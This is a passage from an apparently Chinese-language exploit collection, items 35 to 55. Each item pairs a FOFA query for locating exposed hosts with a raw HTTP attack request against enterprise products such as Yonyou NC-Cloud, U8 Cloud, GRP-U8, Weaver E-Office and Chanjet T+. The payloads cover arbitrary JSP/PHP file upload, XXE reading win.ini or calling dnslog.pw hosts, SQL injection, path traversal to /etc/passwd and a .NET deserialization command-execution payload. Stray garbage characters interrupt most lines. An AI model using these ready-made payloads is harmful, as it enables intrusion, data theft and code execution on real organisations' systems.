Host: your-ip
! D  B/ l/ A4 E6 V* mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 L* ~& k0 f8 \) M1 A
Content-Type: application/x-www-form-urlencoded9 J5 E# i: _! E! u- u
Accept-Encoding: gzip, deflate; o, a3 w! `' t; p2 T
Accept: */*9 Y: K+ O5 e6 m
Connection: keep-alive- G6 Y0 N7 k2 G

3 F  T- m; J: r& o/ [# X/ z, d9 ~7 G/ H
35. 用友NC-Cloud importhttpscer任意文件上传
$ y) Q3 ^; H  `FOFA:app="用友-NC-Cloud"9 F/ q4 u3 b$ c6 ~2 X% s; ?& [1 j
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
: F5 ?5 t9 z. A/ O, `Host: 203.25.218.166:88889 C7 _& a; f  Z; j3 k6 Y
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 y# N% X; ]2 X* \
Accept-Encoding: gzip, deflate3 d0 _3 x) G" P
Accept: */*% e: ^! F5 P& f) W) L, D
Connection: close
& P" A7 K0 ~  B2 IaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA- F: H: [, ?+ D1 c1 v5 Q9 k
Content-Length: 190
5 y" U# B& E( c7 ?Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0' y3 J2 f; o8 P, d* X
* z  t" B- \& l  U
--fd28cb44e829ed1c197ec3bc71748df0, B6 C3 A# A/ r2 A# h1 ]+ e
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
/ g" T% S' Y6 K5 ~& E( q1 U3 X; j& y5 r
<%out.println(1111*1111);%>4 S9 j- X" o3 n& ^* A. Z( h/ T: p
--fd28cb44e829ed1c197ec3bc71748df0--" [/ Y3 \$ Z$ X- k

$ D6 U' F: ?" ~% N" \& B
* n& K+ u. m9 b5 u8 @5 I! M36. 用友NC-Cloud soapFormat XXE: ^1 v& K& n) Y- e3 ~
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ x. ^0 g$ w; `- ?4 k$ l- \% @
POST /uapws/soapFormat.ajax HTTP/1.14 Z% L' e  k* j" W. z& Q
Host: 192.168.40.130:89891 O5 T& `$ S) b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0! |* ?+ x. b3 w1 f0 p/ L, t: F
Content-Length: 263
+ N# Y" Y+ S8 o) T1 V- t, u. ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* z, t; c) s  `* Y; F/ uAccept-Encoding: gzip, deflate
  P1 I& B' T/ s1 v# O$ eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 s- H$ N5 o6 `0 G2 v6 ]Connection: close! b6 C& p$ _; K! V
Content-Type: application/x-www-form-urlencoded" M0 t+ \0 c' S& z
Upgrade-Insecure-Requests: 1
3 B; I% h' [' P
) y! G9 z2 N' P# s6 R2 t. Fmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
+ D8 i# ~% N; t# t3 {6 G  P* R9 k; W2 K
# U7 P6 X5 X3 F) s; H6 k' V
37. 用友NC-Cloud IUpdateService XXE
0 F0 }2 f5 @+ B* R& WFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 u* Z) r6 U4 D/ \. U" i: U( APOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
2 l% Y$ Y* B& N! e' p5 e2 p. z3 U) `) PHost: 192.168.40.130:8989! e' f6 z2 r0 l5 E: e# J4 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.365 {$ h1 D9 B$ k- M
Content-Length: 421
) K, Z9 k7 F, vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: V$ Q% k; ?! q9 b6 ~
Accept-Encoding: gzip, deflate
  |) ~! Z. J0 KAccept-Language: zh-CN,zh;q=0.9% {2 n. r+ t8 B) v1 X7 ~
Connection: close1 j- ~6 R/ P5 p. b0 Z
Content-Type: text/xml;charset=UTF-85 L; }3 p! I7 j! G7 C2 u
SOAPAction: urn:getResult: @1 I' _& U& L% \4 o, g! j
Upgrade-Insecure-Requests: 1, E* @. P" m' v& t3 E
/ h% ^; N; ?# M0 O" c3 u
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
4 C: X6 x8 I" H! ?2 C/ E8 `<soapenv:Header/>0 F; J" |& R: X8 G2 G+ N5 R" @
<soapenv:Body>
5 a9 Z* _3 t, L/ o. [5 c<iup:getResult>; Q' n7 d  ]4 C' e7 y! D% N
<!--type: string-->4 b. [% Q9 ^8 u- Q: E* o
<iup:string><![CDATA[
3 K8 M5 K8 s3 s) T: z' q  q<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
  P" `- ]- b5 n# s<xxx/>]]></iup:string>7 z! p8 Q% p) I0 U1 L6 g
</iup:getResult>5 k& X9 |1 @# k1 C" F. E  w7 n
</soapenv:Body>
/ ]/ L3 i5 T- x  K- {0 _</soapenv:Envelope>
$ e. k- p3 c' [6 E9 x9 v  i
+ `, E! j+ _3 ]1 ^+ J; F$ M5 {) c5 C+ i- ]1 p8 O( m
/ {: K- f8 J% j6 K  h
38. 用友U8 Cloud smartweb2.RPC.d XXE9 d/ {. s2 p0 Y& X- p, O) s
FOFA:app="用友-U8-Cloud"( W3 J8 j  H8 u
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1: z; E2 `# B4 ?; B
Host: 192.168.40.131:8088
7 O2 {( u1 {' O) p+ z. P1 n+ NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
0 c* x4 w; V2 Y6 G; [Content-Length: 260; J+ Q6 F# g4 V/ n* c8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
% ^/ {7 F# \- H" Z$ z" u* qAccept-Encoding: gzip, deflate, _9 A8 y! C6 M1 m" C! Z5 T
Accept-Language: zh-CN,zh;q=0.9, h; X+ V2 N( N5 }' n0 @  b
Connection: close
4 j; O- F4 X" M0 l' s$ M( r. C  N! FContent-Type: application/x-www-form-urlencoded* ?( R! e  m' h
. `( A) Y4 I- `/ `
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
5 B' s* `% Q( E+ Z! k
( k. M! ~0 p% E' v7 P  k/ t5 f0 S( U7 C8 |- \. W
39. 用友U8 Cloud RegisterServlet SQL注入
* K5 O9 P; n* W* P3 m5 r* {FOFA:title="u8c"5 L) q, }0 ^  v/ o- t* k7 W
POST /servlet/RegisterServlet HTTP/1.1
  |4 E( R' b3 P' Q$ ^3 S  b/ wHost: 192.168.86.128:8089
7 R( q# n) E7 ^8 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.367 M+ ]2 n6 j" N4 E; o
Connection: close: L) l. J3 r; B
Content-Length: 85
1 s! d4 j, y' S( m8 t, C! Y8 @- uAccept: */*
$ k" O3 f( v: Q& _+ VAccept-Language: en
/ I/ u+ p0 q# t  i5 N" t0 rContent-Type: application/x-www-form-urlencoded0 Q% p; t. \, y& O/ t# E; t" T, J
X-Forwarded-For: 127.0.0.1+ [; x2 q9 ^' `4 y/ Q4 {( w
Accept-Encoding: gzip2 f" w( {% ]6 f8 ~8 \2 |' G. ?
' i1 l6 s  l7 j+ t, Y. Y
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--% v2 a/ ?: l+ a% l" w

' i. @* d: H: a7 ^2 Q4 s
# C' d; F! a5 J: e1 I40. 用友U8-Cloud XChangeServlet XXE
. W5 a/ ]- G1 B4 C# oFOFA:app="用友-U8-Cloud"
2 w4 q( Z7 W% Z: g+ [/ lPOST /service/XChangeServlet HTTP/1.1! `6 k0 O* W* x
Host: x.x.x.x; k1 J- \; O; N! k, x; E
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; G: d* C. F% {; A, i/ C6 OContent-Type: text/xml- L9 I4 x2 B9 }* o! S
Connection: close
* ~. V) o$ K8 ?. \1 c3 L% y( b6 N4 r% ~; Y
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>) l) d3 D" a3 m" P

) [' c! F' F9 x1 [) E: n+ E5 d0 q9 v# E+ C9 l3 t
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
! `0 E5 o6 i( E1 Y1 IFOFA:app="用友-U8-Cloud"
* |- u8 _$ n# X; Y# hGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
$ V3 x$ A$ P( w8 l1 PHost:
9 B' {0 K; o8 ^, `# UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 G  ]8 f1 ]# k
Content-Type: application/json6 r4 `1 A; r& R" ^% a4 A
Accept-Encoding: gzip
0 D( N1 W% s  g: ?Connection: close
: W1 H2 P6 b" B: S- H/ s3 j: X' B! C/ y3 O9 T  D
2 x0 t; g9 H' H9 ]
42. 用友GRP-U8 SmartUpload01 文件上传$ T, W8 f, r1 j) I6 i% @5 {1 L
FOFA:app="用友-GRP-U8". q2 Q0 ~) [4 m/ S
POST /u8qx/SmartUpload01.jsp HTTP/1.1
; }6 H$ f5 S' B+ @; hHost: x.x.x.x1 M1 I1 N0 I+ o: V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
+ m, d+ t! C6 n* w& t, V1 \) ~  rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36/ _+ o. Z9 p" r& x$ z

4 `. O. v! u8 A- fPAYLOAD
' y* Z7 P! {5 F! h$ M% W5 o* K( R
9 r5 w2 ?9 a  l$ t% R3 v
! {% C6 d& T8 Hhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml; e& N0 L( X0 @7 X

4 [) r$ q5 I9 ~+ Y3 j! z% _; V43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* G) v3 l+ R8 u" z  _1 A1 P* S3 X9 BFOFA:app="用友-GRP-U8"8 X5 N$ B4 ]# t, x7 W2 R' q9 I
POST /services/userInfoWeb HTTP/1.1. t3 n+ F" e. K4 G+ L
Host: your-ip
9 v; K0 Y% b' @) o. eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& w' }3 T  k+ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  t$ d2 @% _; a6 f( l  ]
Accept-Encoding: gzip, deflate1 k$ n1 u! ~; Y9 G- h
Accept-Language: zh-CN,zh;q=0.9
3 c" A" N, |5 U1 S5 `Connection: close5 D- Y* u6 M) i4 r9 [6 q8 O
SOAPAction:
5 {, m* }+ m' i6 P* w, K& D! _! {Content-Type: text/xml;charset=UTF-8- g3 Z5 V1 Q) C* }1 R  a

. n& V6 }8 Z! p<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
2 }, E3 w/ T' u# L: i) p' i2 E+ M   <soapenv:Header/>; a9 ^5 s5 b/ O
   <soapenv:Body>
- i% B- P  d/ p* p8 ~      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
, g, y8 P! m% @8 f         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>' `, X, N  g0 f4 y5 R( |
      </ser:getUserNameById>
3 \0 x9 c- p: ~$ z2 O   </soapenv:Body>
3 \& H% R  T  h6 m+ e</soapenv:Envelope>4 V! m# W5 Q2 X/ {
( I* K5 I9 d# Q5 m! z0 f& Q

2 l  h) W2 F+ g7 ^7 l" W% [/ o44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* r4 n% g$ i% w# m2 g, LFOFA:app="用友-GRP-U8"
! `4 O6 L) M$ o# c5 c$ [, |+ c7 QGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
9 n# M; c0 S" l; R/ a# k- J6 THost: your-ip% ^4 b2 E" @( H+ d, j/ g- J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36; g  E7 D  k% e( ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* b, z# U$ b" \0 W- l: O1 DAccept-Encoding: gzip, deflate
7 V5 q1 }! x! Q/ x9 C/ {0 CAccept-Language: zh-CN,zh;q=0.97 K1 I- J; E3 l
Connection: close2 r( O1 E" \' @6 [7 x
3 ^! S& X. W5 V' i! W' H9 b
9 A2 `( l) _1 V  d9 `: c& j6 }7 h
45. 用友GRP-U8 ufgovbank XXE
' j/ k+ W6 @# u* x0 y1 R: {- SFOFA:app="用友-GRP-U8"8 F$ U5 B2 d0 @) {
POST /ufgovbank HTTP/1.11 R% Z4 W% k) L9 m6 b
Host: 192.168.40.130:222
/ |7 f4 g% k! I$ p: U/ k& ~4 u7 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
* ?# k5 ]/ Y/ OConnection: close+ N( a! H* a5 I
Content-Length: 161) Y. W0 @7 V, E- @; O" b  B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- M# @- M' I/ e6 L& x. \( ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, w% m1 R  @$ c  R- |
Content-Type: application/x-www-form-urlencoded/ }" o) D; c% |7 T, {7 U# S0 \
Accept-Encoding: gzip  x$ ~2 \% {$ n) g

- }4 e3 B2 u; b, g) E0 ?reqData=<?xml version="1.0"?>9 y/ m* `+ _$ a. O! J6 x8 \% U2 P  V
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest) z2 J3 S  p( H+ V
" q0 z, W( a% ?* T# S

* W. S' n9 r. Z8 T( X4 c6 A# d46. 用友GRP-U8 sqcxIndex.jsp SQL注入
3 N5 R5 l( x: UFOFA:app="用友-GRP-U8"
) a; h( F) w% [GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
3 @/ _0 u6 _& L) n8 Z/ \- W( N6 d) PHost: your-ip& o9 V2 y1 }, B9 B9 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
# A6 ]$ S  z* g8 ^( VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, m- p* i3 h& _- u% j% p
Accept-Encoding: gzip, deflate
$ X; ~. y0 I% p0 ^: e( YAccept-Language: zh-CN,zh;q=0.9
9 F# T5 @  U5 @: B; cConnection: close
3 h. \3 M) _& [4 w+ `, r+ {7 d( l3 Y* X# q

/ N( W# \  `9 y' \2 J5 q8 [  w47. 用友GRP A++Cloud 政府财务云 任意文件读取5 Z( u+ t" r! p) p
FOFA:body="/pf/portal/login/css/fonts/style.css"& Q& s8 W; ^- A! \1 y# o8 g
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1, l( k1 x! \8 ?  L
Host: x.x.x.x; I# ^& T, C% @4 u+ d# \( E
Cache-Control: max-age=0; B0 `4 d& g+ v, p* _* u
Upgrade-Insecure-Requests: 1- y+ Y; z+ @) b, E2 _. b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 o/ `3 T# Y2 f/ `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 p7 d& ]; i2 f4 u
Accept-Encoding: gzip, deflate, br
8 o3 U; |& ?( W0 o$ I! r8 r8 bAccept-Language: zh-CN,zh;q=0.9
3 k" e* w; x, E- ?: r- [5 NIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT  N6 @. f& I8 B2 S
Connection: close5 q- w6 L/ F* ~. b1 S8 ^& E; i

7 G5 I2 B: z6 E9 R. X% ?$ Z6 r6 s8 S0 n: f  @7 r- {) Z
5 N" f6 y" ]& G8 x% i; M* I$ D  K
48. 用友U8 CRM swfupload 任意文件上传
4 `# w+ L3 Q( D5 R7 g# G* ]; ~+ iFOFA:title="用友U8CRM"' N; n' j* |" v6 v/ y5 \4 |% z
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
& e2 j0 z+ @' hHost: your-ip& q' c* h! K9 a# p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. s; d- n$ z* [+ P5 N; p& T/ ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! u* {3 O( C; H# f  s) g& AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, T! G/ _" u1 A/ o  C
Accept-Encoding: gzip, deflate
3 |0 k( d2 T7 R( S8 iContent-Type: multipart/form-data;boundary=----269520967239406871642430066855. k) ^/ U2 X/ C& J; }
------269520967239406871642430066855% I! p7 P  o* }1 h, z& T/ k
Content-Disposition: form-data; name="file"; filename="s.php"
' v" m0 E  W) E1231; T4 [$ x% q; @# c$ o
Content-Type: application/octet-stream" N: v9 g$ X, N9 G! Z  K
------269520967239406871642430066855& w) R$ [7 F6 n/ E! k% e* `2 z: S
Content-Disposition: form-data; name="upload"/ ~! x6 S; }3 q" Z0 E' _
upload
7 D1 t- k$ |+ b1 Q) p2 b) J+ X------269520967239406871642430066855--5 B5 C0 W3 n( r+ F2 N" i( A
4 B3 n/ t: n$ L) M- R
- y, V, A5 l/ z. D& ?1 f7 @% B
49. 用友U8 CRM系统uploadfile.php接口任意文件上传. H8 L  A% r) `) i! c
FOFA:body="用友U8CRM"9 [- |- m: H! p& }; q

- u. ]9 i( p* B+ c! b; kPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
6 Z+ i1 J, ?4 x* E. ?, y2 xHost: x.x.x.x$ K, s0 j, G) s4 W5 i8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ w# V/ A3 u+ B8 ]Content-Length: 329& f) C; Z# c; X. R3 @& Z) i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- m9 i  f# i: n( y. C2 {. jAccept-Encoding: gzip, deflate
' ?, G- r" G% z' Q8 n9 H. K$ `8 f8 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 l% l+ j0 [6 `1 V5 g/ zConnection: close4 h4 B, D& k5 x4 `
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
# F7 r% T1 R3 J, ], p. Z% j8 V& S6 J8 @
-----------------------------vvv3wdayqv3yppdxvn3w+ u6 d  G- o3 a* s
Content-Disposition: form-data; name="file"; filename="%s.php "; o2 e0 j1 E  v: e- Y  c
Content-Type: application/octet-stream' K( K6 @% `  N0 W
/ @$ x" J( S' H* A3 |
wersqqmlumloqa
' q& j: e! d1 O$ T$ X-----------------------------vvv3wdayqv3yppdxvn3w4 E9 x) p3 S8 v, |4 q
Content-Disposition: form-data; name="upload"
, |- ^- h9 K9 m) H4 _" D& i2 T' e, `- [. P3 S
upload
9 N$ Y- e$ P+ z, p-----------------------------vvv3wdayqv3yppdxvn3w--
6 P* S; m% `6 T' g2 I4 T- ~7 D+ D, J% E  g3 c, _, w$ R
4 b8 D8 t+ w0 y  h$ K
http://x.x.x.x/tmpfile/updB3CB.tmp.php; H  N8 a& J+ f

0 {0 k' \/ N3 e+ J/ s; P, g50. QDocs Smart School 6.4.1 filterRecords SQL注入
7 |) y# V- V" H7 G! u, xFOFA:body="close closebtnmodal"
' [/ }5 l& f8 P- M& o8 ^* ^7 _7 m" J, RPOST /course/filterRecords/ HTTP/1.1; h9 Q: k) t7 v9 ]$ N: S$ |( s: M
Host: x.x.x.x1 e/ K8 [$ Q; k& z/ w! y  l  @3 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, S1 Q; e, L3 A8 \, Z3 Z9 D
Connection: close/ P% D6 z1 z, u; n5 q
Content-Length: 224
/ `3 v1 W4 l3 N9 CAccept: */*8 J4 r, F  f) j+ r
Accept-Language: en7 s0 L; C& U1 H9 h& B. w
Content-Type: application/x-www-form-urlencoded+ Z  W7 @6 f' Q+ x
Accept-Encoding: gzip, p6 F9 O+ w) @! x& w  h

* r" j/ V' Y. ?0 Usearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=18 S7 M) v! A1 C: g; v! `& T
5 @$ y" E0 L1 ]6 Z: i
. b; n! w8 H$ Y; K( d1 D) z4 W% T
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; a1 S5 p1 e; b9 O; R4 T; QFOFA:app="云时空社会化商业ERP系统"- \4 U) Z4 W- f7 g" R5 ?) C
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ g$ E6 V) w- j* w7 Q4 yHost: your-ip
8 |# t$ d5 ^! ~! r" [! t1 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
3 Z# X! O: v6 Q$ Z' l: YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 a: U  j; B) w! |, A
Accept-Encoding: gzip, deflate
5 c9 ~. k" b5 Z" X4 F" ~Accept-Language: zh-CN,zh;q=0.9
, p! h3 ^  ]% _- }( S' \7 i- yConnection: close
( W( D( v- a+ _5 K0 L, I6 P; H1 K) g

% [3 D# q: a6 Y! r) i- c0 L$ G- L52. 泛微E-Office json_common.php sql注入
+ h; G  d* T' s* n0 ZFOFA:app="泛微-EOffice", |, J$ n5 m1 Z( u
POST /building/json_common.php HTTP/1.1
5 `3 p6 v4 a: ^# u  K2 c, tHost: 192.168.86.128:8097
0 @' C# D5 ^! `$ rUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( O! r# G9 b% f0 b* X7 S
Connection: close
9 d/ Y8 H9 n+ ~2 d9 p' H) _Content-Length: 874 L4 {) h$ z. u9 I
Accept: */*
* i. u* @! U. \: {5 GAccept-Language: en! ^6 z0 j2 U6 n9 I7 D( r
Content-Type: application/x-www-form-urlencoded
1 q" ]) C: }- }' m% R5 e( FAccept-Encoding: gzip
8 F& q4 \  m2 N) p, Y" B: z4 Q, J% k1 M8 T5 o7 Y, U) z3 ]% r5 w8 D
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333& @0 ^' i5 }! |1 q
% F2 G6 K  ?2 @9 c0 b$ F: ]8 V0 C
; z, @0 c% U' R9 {+ ]
53. 迪普 DPTech VPN Service 任意文件上传3 C7 A$ z. P! l% H
FOFA:app="DPtech-SSLVPN"
" W- i) _9 ~. d  O/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd: S9 N8 x7 p% \1 D0 O, j8 ^/ W
" j0 s2 h. [" H+ h: U( |

0 V4 t: @& a% @/ a54. 畅捷通T+ getstorewarehousebystore 远程代码执行6 P- ]" {1 V3 z7 _- v" I5 _
FOFA:app="畅捷通-TPlus"4 f: o/ s2 {9 T2 j" \+ a0 d
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件; t+ x9 S- E: b) H. X0 A+ Z& D4 l
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. S! Q; f& B0 Q. V. h- S4 Z% p
9 k7 W- b4 R& C+ j
$ `9 c, F$ d6 I4 `! S! K" S, k2 d( k7 P完整数据包
2 z1 a" U# f: SPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1  n" ~0 L: O+ S, |
Host: x.x.x.x( [# F& T# o3 G6 v) C$ R7 O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
$ J; E' G" x' Q6 Z8 q& _5 s9 U* L7 tContent-Length: 593
  y, z8 ^. a7 c8 _% z9 i5 ]: M5 t! n4 Y1 r
{
8 C9 q1 L$ U5 r- G"storeID":{- P% y1 n& n, ?( m6 I8 e
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
1 L, S3 a4 O& _& E "MethodName":"Start",- e' d* k; K' {9 k& P
  "ObjectInstance":{( U5 p1 Z" y( r' y7 o* Z
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; Q  o9 ?) n4 H& g    "StartInfo":{0 X& a% |9 x. x
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% r  B1 j* l: _; A" O
    "FileName":"cmd",
2 S7 `" U) L+ L7 ^5 C* \$ Q    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt") \& z( G: |2 W) C; V9 a  b* P* k
    }
. _1 p! o$ R) @  }
; q' b' K9 P  P( f& j) G4 `  }/ F! W, o7 ?$ e! v
}
3 S* n- n+ L8 r" I* x, q1 R
+ j9 [3 D% T  ^0 \
0 z, f/ ]! k4 g# Q  k第二步,访问如下url7 D% U0 ^9 x4 n+ X
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt% B% G- i# S' o: l" ]

) g$ E0 }6 s( o0 w: z' N2 C1 z2 p3 a- E
55. 畅捷通T+ getdecallusers信息泄露/ N: g9 }  h) K' a
FOFA:app="畅捷通-TPlus"
6 ]6 ]5 e; O4 h% d, C. {第一步,通过% t3 w) g" }1 f* r3 W, O
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
